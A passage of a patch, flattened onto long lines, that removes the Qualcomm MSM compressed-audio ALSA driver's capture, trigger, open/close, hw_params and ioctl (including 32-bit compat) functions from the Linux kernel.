prtd->session_id, substream->stream); -- break; -- default: -- pr_debug("q6asm_open_read_compressed(COMPRESSED_META_DATA_MODE)\n"); -- /* -- ret = q6asm_open_read_compressed(prtd->audio_client, -- MAX_NUM_FRAMES_PER_BUFFER, -- COMPRESSED_META_DATA_MODE); -- */ -- ret = -EINVAL; -- break; -- } -- -- if (ret < 0) { -- pr_err("%s: compressed Session out open failed\n", -- __func__); -- return -ENOMEM; -- } -- -- ret = q6asm_set_io_mode(prtd->audio_client, -- (COMPRESSED_IO | ASYNC_IO_MODE)); -- if (ret < 0) { -- pr_err("%s: Set IO mode failed\n", __func__); -- return -ENOMEM; -- } -- -- if (!msm_compr_capture_codecs(codec->id)) { -- /* -- * request codec invalid or not supported, -- * use default compress format -- */ -- codec->id = SND_AUDIOCODEC_AMRWB; -- } -- /* rate and channels are sent to audio driver */ -- prtd->samp_rate = runtime->rate; -- prtd->channel_mode = runtime->channels; -- -- if (prtd->enabled) -- return ret; -- read_param.len = prtd->pcm_count; -- -- switch (codec->id) { -- case SND_AUDIOCODEC_AMRWB: -- pr_debug("SND_AUDIOCODEC_AMRWB\n"); -- ret = q6asm_enc_cfg_blk_amrwb(prtd->audio_client, -- MAX_NUM_FRAMES_PER_BUFFER, -- /* -- * use fixed band mode and dtx mode -- * band mode - 23.85 kbps -- */ -- AMR_WB_BAND_MODE, -- /* dtx mode - disable */ -- AMR_WB_DTX_MODE); -- if (ret < 0) -- pr_err("%s: CMD Format block failed: %d\n", -- __func__, ret); -- break; -- default: -- pr_debug("No config for codec %d\n", codec->id); -- } -- pr_debug("%s: Samp_rate = %d, Channel = %d, pcm_size = %d,\n" -- "pcm_count = %d, periods = %d\n", -- __func__, prtd->samp_rate, prtd->channel_mode, -- prtd->pcm_size, prtd->pcm_count, runtime->periods); -- -- for (i = 0; i < runtime->periods; i++) { -- read_param.uid = i; -- switch (codec->id) { -- case SND_AUDIOCODEC_AMRWB: -- read_param.len = prtd->pcm_count -- - COMPRE_CAPTURE_HEADER_SIZE; -- read_param.paddr = buf[i].phys -- + COMPRE_CAPTURE_HEADER_SIZE; -- pr_debug("Push buffer [%d] to DSP, paddr: %pK, vaddr: %pK\n", -- 
i, &read_param.paddr, -- buf[i].data); -- q6asm_async_read(prtd->audio_client, &read_param); -- break; -- default: -- read_param.paddr = buf[i].phys; -- /*q6asm_async_read_compressed(prtd->audio_client, -- &read_param);*/ -- pr_debug("%s: To add support for read compressed\n", -- __func__); -- ret = -EINVAL; -- break; -- } -- } -- prtd->periods = runtime->periods; -- -- prtd->enabled = 1; -- -- return ret; --} -- --static int msm_compr_trigger(struct snd_pcm_substream *substream, int cmd) --{ -- int ret = 0; -- struct snd_pcm_runtime *runtime = substream->runtime; -- struct snd_soc_pcm_runtime *soc_prtd = substream->private_data; -- struct compr_audio *compr = runtime->private_data; -- struct msm_audio *prtd = &compr->prtd; -- -- pr_debug("%s\n", __func__); -- switch (cmd) { -- case SNDRV_PCM_TRIGGER_START: -- prtd->pcm_irq_pos = 0; -- -- if (substream->stream == SNDRV_PCM_STREAM_CAPTURE) { -- if (!msm_compr_capture_codecs( -- compr->info.codec_param.codec.id)) { -- /* -- * request codec invalid or not supported, -- * use default compress format -- */ -- compr->info.codec_param.codec.id = -- SND_AUDIOCODEC_AMRWB; -- } -- switch (compr->info.codec_param.codec.id) { -- case SND_AUDIOCODEC_AMRWB: -- break; -- default: -- msm_pcm_routing_reg_psthr_stream( -- soc_prtd->dai_link->be_id, -- prtd->session_id, substream->stream); -- break; -- } -- } -- atomic_set(&prtd->pending_buffer, 1); -- case SNDRV_PCM_TRIGGER_RESUME: -- case SNDRV_PCM_TRIGGER_PAUSE_RELEASE: -- pr_debug("%s: Trigger start\n", __func__); -- q6asm_run_nowait(prtd->audio_client, 0, 0, 0); -- atomic_set(&prtd->start, 1); -- break; -- case SNDRV_PCM_TRIGGER_STOP: -- pr_debug("SNDRV_PCM_TRIGGER_STOP\n"); -- if (substream->stream == SNDRV_PCM_STREAM_CAPTURE) { -- switch (compr->info.codec_param.codec.id) { -- case SND_AUDIOCODEC_AMRWB: -- break; -- default: -- msm_pcm_routing_reg_psthr_stream( -- soc_prtd->dai_link->be_id, -- prtd->session_id, substream->stream); -- break; -- } -- } -- 
atomic_set(&prtd->start, 0); -- runtime->render_flag &= ~SNDRV_RENDER_STOPPED; -- break; -- case SNDRV_PCM_TRIGGER_SUSPEND: -- case SNDRV_PCM_TRIGGER_PAUSE_PUSH: -- pr_debug("SNDRV_PCM_TRIGGER_PAUSE\n"); -- q6asm_cmd_nowait(prtd->audio_client, CMD_PAUSE); -- atomic_set(&prtd->start, 0); -- runtime->render_flag &= ~SNDRV_RENDER_STOPPED; -- break; -- default: -- ret = -EINVAL; -- break; -- } -- -- return ret; --} -- --static void populate_codec_list(struct compr_audio *compr, -- struct snd_pcm_runtime *runtime) --{ -- pr_debug("%s\n", __func__); -- /* MP3 Block */ -- compr->info.compr_cap.num_codecs = 5; -- compr->info.compr_cap.min_fragment_size = runtime->hw.period_bytes_min; -- compr->info.compr_cap.max_fragment_size = runtime->hw.period_bytes_max; -- compr->info.compr_cap.min_fragments = runtime->hw.periods_min; -- compr->info.compr_cap.max_fragments = runtime->hw.periods_max; -- compr->info.compr_cap.codecs[0] = SND_AUDIOCODEC_MP3; -- compr->info.compr_cap.codecs[1] = SND_AUDIOCODEC_AAC; -- compr->info.compr_cap.codecs[2] = SND_AUDIOCODEC_AC3; -- compr->info.compr_cap.codecs[3] = SND_AUDIOCODEC_EAC3; -- compr->info.compr_cap.codecs[4] = SND_AUDIOCODEC_AMRWB; -- /* Add new codecs here */ --} -- --static int msm_compr_open(struct snd_pcm_substream *substream) --{ -- struct snd_pcm_runtime *runtime = substream->runtime; -- struct compr_audio *compr; -- struct msm_audio *prtd; -- int ret = 0; -- -- pr_debug("%s\n", __func__); -- compr = kzalloc(sizeof(struct compr_audio), GFP_KERNEL); -- if (compr == NULL) { -- pr_err("Failed to allocate memory for msm_audio\n"); -- return -ENOMEM; -- } -- prtd = &compr->prtd; -- prtd->substream = substream; -- runtime->render_flag = SNDRV_DMA_MODE; -- prtd->audio_client = q6asm_audio_client_alloc( -- (app_cb)compr_event_handler, compr); -- if (!prtd->audio_client) { -- pr_info("%s: Could not allocate memory\n", __func__); -- kfree(prtd); -- return -ENOMEM; -- } -- -- prtd->audio_client->perf_mode = false; -- pr_info("%s: session ID 
%d\n", __func__, prtd->audio_client->session); -- -- prtd->session_id = prtd->audio_client->session; -- -- if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK) { -- runtime->hw = msm_compr_hardware_playback; -- prtd->cmd_ack = 1; -- } else { -- runtime->hw = msm_compr_hardware_capture; -- } -- -- -- ret = snd_pcm_hw_constraint_list(runtime, 0, -- SNDRV_PCM_HW_PARAM_RATE, -- &constraints_sample_rates); -- if (ret < 0) -- pr_info("snd_pcm_hw_constraint_list failed\n"); -- /* Ensure that buffer size is a multiple of period size */ -- ret = snd_pcm_hw_constraint_integer(runtime, -- SNDRV_PCM_HW_PARAM_PERIODS); -- if (ret < 0) -- pr_info("snd_pcm_hw_constraint_integer failed\n"); -- -- prtd->dsp_cnt = 0; -- atomic_set(&prtd->pending_buffer, 1); -- if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK) -- compr->codec = FORMAT_MP3; -- populate_codec_list(compr, runtime); -- runtime->private_data = compr; -- atomic_set(&prtd->eos, 0); -- return 0; --} -- --static int compressed_set_volume(struct msm_audio *prtd, uint32_t volume) --{ -- int rc = 0; -- int avg_vol = 0; -- int lgain = (volume >> 16) & 0xFFFF; -- int rgain = volume & 0xFFFF; -- if (prtd && prtd->audio_client) { -- pr_debug("%s: channels %d volume 0x%x\n", __func__, -- prtd->channel_mode, volume); -- if ((prtd->channel_mode == 2) && -- (lgain != rgain)) { -- pr_debug("%s: call q6asm_set_lrgain\n", __func__); -- rc = q6asm_set_lrgain(prtd->audio_client, lgain, rgain); -- } else { -- avg_vol = (lgain + rgain)/2; -- pr_debug("%s: call q6asm_set_volume\n", __func__); -- rc = q6asm_set_volume(prtd->audio_client, avg_vol); -- } -- if (rc < 0) { -- pr_err("%s: Send Volume command failed rc=%d\n", -- __func__, rc); -- } -- } -- return rc; --} -- --static int msm_compr_playback_close(struct snd_pcm_substream *substream) --{ -- struct snd_pcm_runtime *runtime = substream->runtime; -- struct snd_soc_pcm_runtime *soc_prtd = substream->private_data; -- struct compr_audio *compr = runtime->private_data; -- struct msm_audio 
*prtd = &compr->prtd; -- int dir = 0; -- -- pr_debug("%s\n", __func__); -- -- dir = IN; -- atomic_set(&prtd->pending_buffer, 0); -- -- prtd->pcm_irq_pos = 0; -- q6asm_cmd(prtd->audio_client, CMD_CLOSE); -- q6asm_audio_client_buf_free_contiguous(dir, -- prtd->audio_client); -- msm_pcm_routing_dereg_phy_stream( -- soc_prtd->dai_link->be_id, -- SNDRV_PCM_STREAM_PLAYBACK); -- q6asm_audio_client_free(prtd->audio_client); -- kfree(prtd); -- return 0; --} -- --static int msm_compr_capture_close(struct snd_pcm_substream *substream) --{ -- struct snd_pcm_runtime *runtime = substream->runtime; -- struct snd_soc_pcm_runtime *soc_prtd = substream->private_data; -- struct compr_audio *compr = runtime->private_data; -- struct msm_audio *prtd = &compr->prtd; -- int dir = OUT; -- -- pr_debug("%s\n", __func__); -- atomic_set(&prtd->pending_buffer, 0); -- q6asm_cmd(prtd->audio_client, CMD_CLOSE); -- q6asm_audio_client_buf_free_contiguous(dir, -- prtd->audio_client); -- msm_pcm_routing_dereg_phy_stream(soc_prtd->dai_link->be_id, -- SNDRV_PCM_STREAM_CAPTURE); -- q6asm_audio_client_free(prtd->audio_client); -- kfree(prtd); -- return 0; --} -- --static int msm_compr_close(struct snd_pcm_substream *substream) --{ -- int ret = 0; -- -- if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK) -- ret = msm_compr_playback_close(substream); -- else if (substream->stream == SNDRV_PCM_STREAM_CAPTURE) -- ret = msm_compr_capture_close(substream); -- return ret; --} -- --static int msm_compr_prepare(struct snd_pcm_substream *substream) --{ -- int ret = 0; -- -- if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK) -- ret = msm_compr_playback_prepare(substream); -- else if (substream->stream == SNDRV_PCM_STREAM_CAPTURE) -- ret = msm_compr_capture_prepare(substream); -- return ret; --} -- --static snd_pcm_uframes_t msm_compr_pointer(struct snd_pcm_substream *substream) --{ -- -- struct snd_pcm_runtime *runtime = substream->runtime; -- struct compr_audio *compr = runtime->private_data; -- struct msm_audio 
*prtd = &compr->prtd; -- -- if (prtd->pcm_irq_pos >= prtd->pcm_size) -- prtd->pcm_irq_pos = 0; -- -- pr_debug("%s: pcm_irq_pos = %d, pcm_size = %d, sample_bits = %d,\n" -- "frame_bits = %d\n", __func__, prtd->pcm_irq_pos, -- prtd->pcm_size, runtime->sample_bits, -- runtime->frame_bits); -- return bytes_to_frames(runtime, (prtd->pcm_irq_pos)); --} -- --static int msm_compr_mmap(struct snd_pcm_substream *substream, -- struct vm_area_struct *vma) --{ -- struct snd_pcm_runtime *runtime = substream->runtime; -- struct msm_audio *prtd = runtime->private_data; -- struct audio_client *ac = prtd->audio_client; -- struct audio_port_data *apd = ac->port; -- struct audio_buffer *ab; -- int dir = -1; -- -- prtd->mmap_flag = 1; -- runtime->render_flag = SNDRV_NON_DMA_MODE; -- if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK) -- dir = IN; -- else -- dir = OUT; -- ab = &(apd[dir].buf[0]); -- -- return msm_audio_ion_mmap(ab, vma); --} -- --static int msm_compr_hw_params(struct snd_pcm_substream *substream, -- struct snd_pcm_hw_params *params) --{ -- struct snd_pcm_runtime *runtime = substream->runtime; -- struct compr_audio *compr = runtime->private_data; -- struct msm_audio *prtd = &compr->prtd; -- struct snd_dma_buffer *dma_buf = &substream->dma_buffer; -- struct audio_buffer *buf; -- int dir, ret; -- -- if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK) -- dir = IN; -- else -- dir = OUT; -- /* Modifying kernel hardware params based on userspace config */ -- if (params_periods(params) > 0 && -- (params_periods(params) != runtime->hw.periods_max)) { -- runtime->hw.periods_max = params_periods(params); -- } -- if (params_period_bytes(params) > 0 && -- (params_period_bytes(params) != runtime->hw.period_bytes_min)) { -- runtime->hw.period_bytes_min = params_period_bytes(params); -- } -- runtime->hw.buffer_bytes_max = -- runtime->hw.period_bytes_min * runtime->hw.periods_max; -- pr_debug("allocate %zd buffers each of size %d\n", -- runtime->hw.period_bytes_min, -- 
runtime->hw.periods_max); -- ret = q6asm_audio_client_buf_alloc_contiguous(dir, -- prtd->audio_client, -- runtime->hw.period_bytes_min, -- runtime->hw.periods_max); -- if (ret < 0) { -- pr_err("Audio Start: Buffer Allocation failed rc = %d\n", -- ret); -- return -ENOMEM; -- } -- buf = prtd->audio_client->port[dir].buf; -- -- dma_buf->dev.type = SNDRV_DMA_TYPE_DEV; -- dma_buf->dev.dev = substream->pcm->card->dev; -- dma_buf->private_data = NULL; -- dma_buf->area = buf[0].data; -- dma_buf->addr = buf[0].phys; -- dma_buf->bytes = runtime->hw.buffer_bytes_max; -- -- pr_debug("%s: buf[%pK]dma_buf->area[%pK]dma_buf->addr[%pK]\n" -- "dma_buf->bytes[%zd]\n", __func__, -- (void *)buf, (void *)dma_buf->area, -- &dma_buf->addr, dma_buf->bytes); -- if (!dma_buf->area) -- return -ENOMEM; -- -- snd_pcm_set_runtime_buffer(substream, &substream->dma_buffer); -- return 0; --} -- --static int msm_compr_ioctl_shared(struct snd_pcm_substream *substream, -- unsigned int cmd, void *arg) --{ -- int rc = 0; -- struct snd_pcm_runtime *runtime = substream->runtime; -- struct compr_audio *compr = runtime->private_data; -- struct msm_audio *prtd = &compr->prtd; -- uint64_t timestamp; -- uint64_t temp; -- -- switch (cmd) { -- case SNDRV_COMPRESS_TSTAMP: { -- struct snd_compr_tstamp *tstamp; -- pr_debug("SNDRV_COMPRESS_TSTAMP\n"); -- tstamp = arg; -- memset(tstamp, 0x0, sizeof(*tstamp)); -- rc = q6asm_get_session_time(prtd->audio_client, ×tamp); -- if (rc < 0) { -- pr_err("%s: Get Session Time return value =%lld\n", -- __func__, timestamp); -- return -EAGAIN; -- } -- temp = (timestamp * 2 * runtime->channels); -- temp = temp * (runtime->rate/1000); -- temp = div_u64(temp, 1000); -- tstamp->sampling_rate = runtime->rate; -- tstamp->timestamp = timestamp; -- pr_debug("%s: bytes_consumed:,timestamp = %lld,\n", -- __func__, -- tstamp->timestamp); -- return 0; -- } -- case SNDRV_COMPRESS_GET_CAPS: { -- struct snd_compr_caps *caps; -- caps = arg; -- memset(caps, 0, sizeof(*caps)); -- 
pr_debug("SNDRV_COMPRESS_GET_CAPS\n"); -- memcpy(caps, &compr->info.compr_cap, sizeof(*caps)); -- return 0; -- } -- case SNDRV_COMPRESS_SET_PARAMS: -- pr_debug("SNDRV_COMPRESS_SET_PARAMS:\n"); -- memcpy(&compr->info.codec_param, (void *) arg, -- sizeof(struct snd_compr_params)); -- switch (compr->info.codec_param.codec.id) { -- case SND_AUDIOCODEC_MP3: -- /* For MP3 we dont need any other parameter */ -- pr_debug("SND_AUDIOCODEC_MP3\n"); -- compr->codec = FORMAT_MP3; -- break; -- case SND_AUDIOCODEC_AAC: -- pr_debug("SND_AUDIOCODEC_AAC\n"); -- compr->codec = FORMAT_MPEG4_AAC; -- break; -- case SND_AUDIOCODEC_AC3: { -- char params_value[MAX_AC3_PARAM_SIZE]; -- int *params_value_data = (int *)params_value; -- /* 36 is the max param length for ddp */ -- int i; -- struct snd_dec_ddp *ddp = -- &compr->info.codec_param.codec.options.ddp; -- uint32_t params_length = 0; -- memset(params_value, 0, MAX_AC3_PARAM_SIZE); -- /* check integer overflow */ -- if (ddp->params_length > UINT_MAX/sizeof(int)) { -- pr_err("%s: Integer overflow ddp->params_length %d\n", -- __func__, ddp->params_length); -- return -EINVAL; -- } -- params_length = ddp->params_length*sizeof(int); -- if (params_length > MAX_AC3_PARAM_SIZE) { -- /*MAX is 36*sizeof(int) this should not happen*/ -- pr_err("%s: params_length(%d) is greater than %zd\n", -- __func__, params_length, MAX_AC3_PARAM_SIZE); -- return -EINVAL; -- } -- pr_debug("SND_AUDIOCODEC_AC3\n"); -- compr->codec = FORMAT_AC3; -- pr_debug("params_length: %d\n", ddp->params_length); -- for (i = 0; i < params_length/sizeof(int); i++) -- pr_debug("params_value[%d]: %x\n", i, -- params_value_data[i]); -- for (i = 0; i < ddp->params_length/2; i++) { -- ddp->params_id[i] = params_value_data[2*i]; -- ddp->params_value[i] = params_value_data[2*i+1]; -- } -- if (atomic_read(&prtd->start)) { -- rc = msm_compr_send_ddp_cfg(prtd->audio_client, -- ddp); -- if (rc < 0) -- pr_err("%s: DDP CMD CFG failed\n", -- __func__); -- } -- break; -- } -- case 
SND_AUDIOCODEC_EAC3: { -- char params_value[MAX_AC3_PARAM_SIZE]; -- int *params_value_data = (int *)params_value; -- /* 36 is the max param length for ddp */ -- int i; -- struct snd_dec_ddp *ddp = -- &compr->info.codec_param.codec.options.ddp; -- uint32_t params_length = 0; -- memset(params_value, 0, MAX_AC3_PARAM_SIZE); -- /* check integer overflow */ -- if (ddp->params_length > UINT_MAX/sizeof(int)) { -- pr_err("%s: Integer overflow ddp->params_length %d\n", -- __func__, ddp->params_length); -- return -EINVAL; -- } -- params_length = ddp->params_length*sizeof(int); -- if (params_length > MAX_AC3_PARAM_SIZE) { -- /*MAX is 36*sizeof(int) this should not happen*/ -- pr_err("%s: params_length(%d) is greater than %zd\n", -- __func__, params_length, MAX_AC3_PARAM_SIZE); -- return -EINVAL; -- } -- pr_debug("SND_AUDIOCODEC_EAC3\n"); -- compr->codec = FORMAT_EAC3; -- pr_debug("params_length: %d\n", ddp->params_length); -- for (i = 0; i < ddp->params_length; i++) -- pr_debug("params_value[%d]: %x\n", i, -- params_value_data[i]); -- for (i = 0; i < ddp->params_length/2; i++) { -- ddp->params_id[i] = params_value_data[2*i]; -- ddp->params_value[i] = params_value_data[2*i+1]; -- } -- if (atomic_read(&prtd->start)) { -- rc = msm_compr_send_ddp_cfg(prtd->audio_client, -- ddp); -- if (rc < 0) -- pr_err("%s: DDP CMD CFG failed\n", -- __func__); -- } -- break; -- } -- default: -- pr_debug("FORMAT_LINEAR_PCM\n"); -- compr->codec = FORMAT_LINEAR_PCM; -- break; -- } -- return 0; -- case SNDRV_PCM_IOCTL1_RESET: -- pr_debug("SNDRV_PCM_IOCTL1_RESET\n"); -- /* Flush only when session is started during CAPTURE, -- while PLAYBACK has no such restriction. 
*/ -- if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK || -- (substream->stream == SNDRV_PCM_STREAM_CAPTURE && -- atomic_read(&prtd->start))) { -- if (atomic_read(&prtd->eos)) { -- prtd->cmd_interrupt = 1; -- wake_up(&the_locks.eos_wait); -- atomic_set(&prtd->eos, 0); -- } -- -- /* A unlikely race condition possible with FLUSH -- DRAIN if ack is set by flush and reset by drain */ -- prtd->cmd_ack = 0; -- rc = q6asm_cmd(prtd->audio_client, CMD_FLUSH); -- if (rc < 0) { -- pr_err("%s: flush cmd failed rc=%d\n", -- __func__, rc); -- return rc; -- } -- rc = wait_event_timeout(the_locks.flush_wait, -- prtd->cmd_ack, 5 * HZ); -- if (!rc) -- pr_err("Flush cmd timeout\n"); -- prtd->pcm_irq_pos = 0; -- } -- break; -- case SNDRV_COMPRESS_DRAIN: -- pr_debug("%s: SNDRV_COMPRESS_DRAIN\n", __func__); -- if (atomic_read(&prtd->pending_buffer)) { -- pr_debug("%s: no pending writes, drain would block\n", -- __func__); -- return -EWOULDBLOCK; -- } -- -- atomic_set(&prtd->eos, 1); -- atomic_set(&prtd->pending_buffer, 0); -- prtd->cmd_ack = 0; -- q6asm_cmd_nowait(prtd->audio_client, CMD_EOS); -- /* Wait indefinitely for DRAIN. 
Flush can also signal this*/ -- rc = wait_event_interruptible(the_locks.eos_wait, -- (prtd->cmd_ack || prtd->cmd_interrupt)); -- -- if (rc < 0) -- pr_err("EOS cmd interrupted\n"); -- pr_debug("%s: SNDRV_COMPRESS_DRAIN out of wait\n", __func__); -- -- if (prtd->cmd_interrupt) -- rc = -EINTR; -- -- prtd->cmd_interrupt = 0; -- return rc; -- default: -- break; -- } -- return snd_pcm_lib_ioctl(substream, cmd, arg); --} --#ifdef CONFIG_COMPAT --struct snd_enc_wma32 { -- u32 super_block_align; /* WMA Type-specific data */ -- u32 encodeopt1; -- u32 encodeopt2; --}; -- --struct snd_enc_vorbis32 { -- s32 quality; -- u32 managed; -- u32 max_bit_rate; -- u32 min_bit_rate; -- u32 downmix; --}; -- --struct snd_enc_real32 { -- u32 quant_bits; -- u32 start_region; -- u32 num_regions; --}; -- --struct snd_enc_flac32 { -- u32 num; -- u32 gain; --}; -- --struct snd_enc_generic32 { -- u32 bw; /* encoder bandwidth */ -- s32 reserved[15]; --}; --struct snd_dec_ddp32 { -- u32 params_length; -- u32 params_id[18]; -- u32 params_value[18]; --}; -- --union snd_codec_options32 { -- struct snd_enc_wma32 wma; -- struct snd_enc_vorbis32 vorbis; -- struct snd_enc_real32 real; -- struct snd_enc_flac32 flac; -- struct snd_enc_generic32 generic; -- struct snd_dec_ddp32 ddp; --}; -- --struct snd_codec32 { -- u32 id; -- u32 ch_in; -- u32 ch_out; -- u32 sample_rate; -- u32 bit_rate; -- u32 rate_control; -- u32 profile; -- u32 level; -- u32 ch_mode; -- u32 format; -- u32 align; -- union snd_codec_options32 options; -- u32 reserved[3]; --}; -- --struct snd_compressed_buffer32 { -- u32 fragment_size; -- u32 fragments; --}; -- --struct snd_compr_params32 { -- struct snd_compressed_buffer32 buffer; -- struct snd_codec32 codec; -- u8 no_wake_mode; --}; -- --struct snd_compr_caps32 { -- u32 num_codecs; -- u32 direction; -- u32 min_fragment_size; -- u32 max_fragment_size; -- u32 min_fragments; -- u32 max_fragments; -- u32 codecs[MAX_NUM_CODECS]; -- u32 reserved[11]; --}; --struct snd_compr_tstamp32 { -- u32 
byte_offset; -- u32 copied_total; -- compat_ulong_t pcm_frames; -- compat_ulong_t pcm_io_frames; -- u32 sampling_rate; -- compat_u64 timestamp; --}; --enum { -- SNDRV_COMPRESS_TSTAMP32 = _IOR('C', 0x20, struct snd_compr_tstamp32), -- SNDRV_COMPRESS_GET_CAPS32 = _IOWR('C', 0x10, struct snd_compr_caps32), -- SNDRV_COMPRESS_SET_PARAMS32 = -- _IOW('C', 0x12, struct snd_compr_params32), --}; --static int msm_compr_compat_ioctl(struct snd_pcm_substream *substream, -- unsigned int cmd, void *arg) --{ -- int err = 0; -- switch (cmd) { -- case SNDRV_COMPRESS_TSTAMP32: { -- struct snd_compr_tstamp tstamp; -- struct snd_compr_tstamp32 tstamp32; -- memset(&tstamp, 0, sizeof(tstamp)); -- memset(&tstamp32, 0, sizeof(tstamp32)); -- cmd = SNDRV_COMPRESS_TSTAMP; -- err = msm_compr_ioctl_shared(substream, cmd, &tstamp); -- if (err) { -- pr_err("%s: COMPRESS_TSTAMP failed rc %d\n", -- __func__, err); -- goto bail_out; -- } -- tstamp32.byte_offset = tstamp.byte_offset; -- tstamp32.copied_total = tstamp.copied_total; -- tstamp32.pcm_frames = tstamp.pcm_frames; -- tstamp32.pcm_io_frames = tstamp.pcm_io_frames; -- tstamp32.sampling_rate = tstamp.sampling_rate; -- tstamp32.timestamp = tstamp.timestamp; -- if (copy_to_user(arg, &tstamp32, sizeof(tstamp32))) { -- pr_err("%s: copytouser failed COMPRESS_TSTAMP32\n", -- __func__); -- err = -EFAULT; -- } -- break; -- } -- case SNDRV_COMPRESS_GET_CAPS32: { -- struct snd_compr_caps caps; -- struct snd_compr_caps32 caps32; -- u32 i; -- memset(&caps, 0, sizeof(caps)); -- memset(&caps32, 0, sizeof(caps32)); -- cmd = SNDRV_COMPRESS_GET_CAPS; -- err = msm_compr_ioctl_shared(substream, cmd, &caps); -- if (err) { -- pr_err("%s: GET_CAPS failed rc %d\n", -- __func__, err); -- goto bail_out; -- } -- pr_debug("SNDRV_COMPRESS_GET_CAPS_32\n"); -- if (!err && caps.num_codecs >= MAX_NUM_CODECS) { -- pr_err("%s: Invalid number of codecs\n", __func__); -- err = -EINVAL; -- goto bail_out; -- } -- caps32.direction = caps.direction; -- caps32.max_fragment_size = 
caps.max_fragment_size; -- caps32.max_fragments = caps.max_fragments; -- caps32.min_fragment_size = caps.min_fragment_size; -- caps32.num_codecs = caps.num_codecs; -- for (i = 0; i < caps.num_codecs; i++) -- caps32.codecs[i] = caps.codecs[i]; -- if (copy_to_user(arg, &caps32, sizeof(caps32))) { -- pr_err("%s: copytouser failed COMPRESS_GETCAPS32\n", -- __func__); -- err = -EFAULT; -- } -- break; -- } -- case SNDRV_COMPRESS_SET_PARAMS32: { -- struct snd_compr_params32 params32; -- struct snd_compr_params params; -- memset(¶ms32, 0 , sizeof(params32)); -- memset(¶ms, 0 , sizeof(params)); -- cmd = SNDRV_COMPRESS_SET_PARAMS; -- if (copy_from_user(¶ms32, arg, sizeof(params32))) { -- pr_err("%s: copyfromuser failed SET_PARAMS32\n", -- __func__); -- err = -EFAULT; -- goto bail_out; -- } -- params.no_wake_mode = params32.no_wake_mode; -- params.codec.id = params32.codec.id; -- params.codec.ch_in = params32.codec.ch_in; -- params.codec.ch_out = params32.codec.ch_out; -- params.codec.sample_rate = params32.codec.sample_rate; -- params.codec.bit_rate = params32.codec.bit_rate; -- params.codec.rate_control = params32.codec.rate_control; -- params.codec.profile = params32.codec.profile; -- params.codec.level = params32.codec.level; -- params.codec.ch_mode = params32.codec.ch_mode; -- params.codec.format = params32.codec.format; -- params.codec.align = params32.codec.align; -- -- switch (params.codec.id) { -- case SND_AUDIOCODEC_WMA: -- case SND_AUDIOCODEC_WMA_PRO: -- params.codec.options.wma.encodeopt1 = -- params32.codec.options.wma.encodeopt1; -- params.codec.options.wma.encodeopt2 = -- params32.codec.options.wma.encodeopt2; -- params.codec.options.wma.super_block_align = -- params32.codec.options.wma.super_block_align; -- break; -- case SND_AUDIOCODEC_VORBIS: -- params.codec.options.vorbis.downmix = -- params32.codec.options.vorbis.downmix; -- params.codec.options.vorbis.managed = -- params32.codec.options.vorbis.managed; -- params.codec.options.vorbis.max_bit_rate = -- 
params32.codec.options.vorbis.max_bit_rate; -- params.codec.options.vorbis.min_bit_rate = -- params32.codec.options.vorbis.min_bit_rate; -- params.codec.options.vorbis.quality = -- params32.codec.options.vorbis.quality; -- break; -- case SND_AUDIOCODEC_REAL: -- params.codec.options.real.num_regions = -- params32.codec.options.real.num_regions; -- params.codec.options.real.quant_bits = -- params32.codec.options.real.quant_bits; -- params.codec.options.real.start_region = -- params32.codec.options.real.start_region; -- break; -- case SND_AUDIOCODEC_FLAC: -- params.codec.options.flac.gain = -- params32.codec.options.flac.gain; -- params.codec.options.flac.num = -- params32.codec.options.flac.num; -- break; -- case SND_AUDIOCODEC_DTS: -- case SND_AUDIOCODEC_DTS_PASS_THROUGH: -- case SND_AUDIOCODEC_DTS_LBR: -- case SND_AUDIOCODEC_DTS_LBR_PASS_THROUGH: -- case SND_AUDIOCODEC_DTS_TRANSCODE_LOOPBACK: -- break; -- case SND_AUDIOCODEC_AC3: -- case SND_AUDIOCODEC_EAC3: -- params.codec.options.ddp.params_length = -- params32.codec.options.ddp.params_length; -- memcpy(params.codec.options.ddp.params_value, -- params32.codec.options.ddp.params_value, -- sizeof(params32.codec.options.ddp.params_value)); -- memcpy(params.codec.options.ddp.params_id, -- params32.codec.options.ddp.params_id, -- sizeof(params32.codec.options.ddp.params_id)); -- break; -- default: -- params.codec.options.generic.bw = -- params32.codec.options.generic.bw; -- break; -- } -- if (!err) -- err = msm_compr_ioctl_shared(substream, cmd, ¶ms); -- break; -- } -- default: -- err = msm_compr_ioctl_shared(substream, cmd, arg); -- } --bail_out: -- return err; -- --} --#endif --static int msm_compr_ioctl(struct snd_pcm_substream *substream, -- unsigned int cmd, void *arg) --{ -- int err = 0; -- if (!substream) { -- pr_err("%s: Invalid params\n", __func__); -- return -EINVAL; -- } -- pr_debug("%s called with cmd = %d\n", __func__, cmd); -- switch (cmd) { -- case SNDRV_COMPRESS_TSTAMP: { -- struct snd_compr_tstamp 
tstamp; -- if (!arg) { -- pr_err("%s: Invalid params Tstamp\n", __func__); -- return -EINVAL; -- } -- err = msm_compr_ioctl_shared(substream, cmd, &tstamp); -- if (err) -- pr_err("%s: COMPRESS_TSTAMP failed rc %d\n", -- __func__, err); -- if (!err && copy_to_user(arg, &tstamp, sizeof(tstamp))) { -- pr_err("%s: copytouser failed COMPRESS_TSTAMP\n", -- __func__); -- err = -EFAULT; -- } -- break; -- } -- case SNDRV_COMPRESS_GET_CAPS: { -- struct snd_compr_caps cap; -- if (!arg) { -- pr_err("%s: Invalid params getcaps\n", __func__); -- return -EINVAL; -- } -- pr_debug("SNDRV_COMPRESS_GET_CAPS\n"); -- err = msm_compr_ioctl_shared(substream, cmd, &cap); -- if (err) -- pr_err("%s: GET_CAPS failed rc %d\n", -- __func__, err); -- if (!err && copy_to_user(arg, &cap, sizeof(cap))) { -- pr_err("%s: copytouser failed GET_CAPS\n", -- __func__); -- err = -EFAULT; -- } -- break; -- } -- case SNDRV_COMPRESS_SET_PARAMS: { -- struct snd_compr_params params; -- if (!arg) { -- pr_err("%s: Invalid params setparam\n", __func__); -- return -EINVAL; -- } -- if (copy_from_user(¶ms, arg, -- sizeof(struct snd_compr_params))) { -- pr_err("%s: SET_PARAMS\n", __func__); -- return -EFAULT; -- } -- err = msm_compr_ioctl_shared(substream, cmd, ¶ms); -- if (err) -- pr_err("%s: SET_PARAMS failed rc %d\n", -- __func__, err); -- break; 